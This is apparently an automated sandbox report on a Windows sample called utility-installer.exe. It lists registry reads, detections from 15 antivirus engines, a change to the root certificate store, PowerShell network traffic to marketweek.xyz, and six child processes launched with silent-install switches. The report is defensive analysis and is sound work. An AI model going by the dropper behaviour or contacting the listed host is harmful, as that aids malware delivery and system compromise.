RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000368 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2
RegOpenKeyExW Oct. 4, 2024, 11:14 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\tech 2.00		2

File has been identified by 15 AntiVirus engines on VirusTotal as malicious (15 events)

Bkav	W32.AIDetectMalware
Cynet	Malicious (score: 100)
Skyhigh	BehavesLike.Win32.Trojan.tc
CrowdStrike	win/malicious_confidence_90% (D)
Elastic	malicious (high confidence)
APEX	Malicious
SentinelOne	Static AI - Suspicious PE
Google	Detected
Microsoft	Trojan:Win32/Phonzy.C!ml
Varist	W32/OffLoader.A.gen!Eldorado
McAfee	Artemis!05BF0FB13746
DeepInstinct	MALICIOUS
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	Riskware/Agent
Paloalto	generic.ml

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send Oct. 4, 2024, 11:15 a.m.	buffer: qmfÿO©j©dÆjXsÆ©øP°U¨VBÒµ©¦~À/5 ÀÀÀ À 28,ÿmarketweek.xyz socket: 1708 sent: 118	1	118
send Oct. 4, 2024, 11:15 a.m.	buffer: FBAÌ#xï ÖH¤fÛ¨A÷I)ïoîã5µGh¯ð²½Bë:cæÛ8W-<ç4ÚyP¥ Ê#1ì0É JNOxÀ`·M«O¹õ[¸ÉA1ò¹T´+dMoßÙI9à3ð»1ñ8±¢ socket: 1708 sent: 134	1	134
send Oct. 4, 2024, 11:15 a.m.	buffer: $JÈÇG¶ÇÎrC`$;1cÔN6- B.vÓ]0Ò[öÔ(ãe6!Ç{Ð:æ&½Þ®¨±ü\ÎÇ©!Ë7kÊÒy µaµZ¨=©íÇè;Õ_Ðf,ækpHÿwò&æþ#£HPZÌà*åwh z:´ªÅUüÙúÏö socket: 1708 sent: 149	1	149

One or more non-whitelisted processes were created (6 events)

parent_process	powershell.exe	martian_process	./f_4.exe --silent --allusers=0
parent_process	powershell.exe	martian_process	./f_3.bat
parent_process	powershell.exe	martian_process	./f_1.exe /sub=T32910
parent_process	powershell.exe	martian_process	./f_5.exe /s
parent_process	powershell.exe	martian_process	./f_2.exe
parent_process	powershell.exe	martian_process	./f_6.exe /S

utility-installer.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All